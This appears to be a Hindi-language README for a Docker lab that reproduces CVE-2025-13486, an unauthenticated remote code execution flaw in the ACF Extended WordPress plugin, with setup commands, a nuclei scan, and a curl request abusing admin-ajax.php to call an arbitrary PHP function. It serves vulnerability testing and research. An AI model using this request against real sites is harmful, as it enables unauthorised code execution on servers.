
CVE-2025-13486 (ACF Extended RCE) के लिए डॉकर परीक्षण वातावरण। केवल सुरक्षा अनुसंधान के लिए।
ACF Extended RCE कमजोरी के परीक्षण के लिए एक-बार Docker सेटअप।
# 1. प्लगइन्स डाउनलोड करें (एक बार चलाएं)
./download-plugins.sh
# 2. वातावरण शुरू करें
docker-compose up -d --build
# 3. सेटअप के लिए ~30 सेकंड प्रतीक्षा करें, फिर परीक्षण करें
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888
यदि डाउनलोड स्क्रिप्ट विफल हो जाती है, तो इन फ़ाइलों को plugins/ में मैन्युअल रूप से रखें:
ACF Pro (आवश्यक निर्भरता)
plugins/acf-pro.zipACF Extended 0.9.0.5 (कमजोर संस्करण)
plugins/acf-extended.zip# होमपेज से nonce निकालें
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'
# print_r के साथ RCE परीक्षण करें
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
-d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"
docker-compose down -v
call_user_func_array() के माध्यम से बिना प्रमाणीकरण के RCE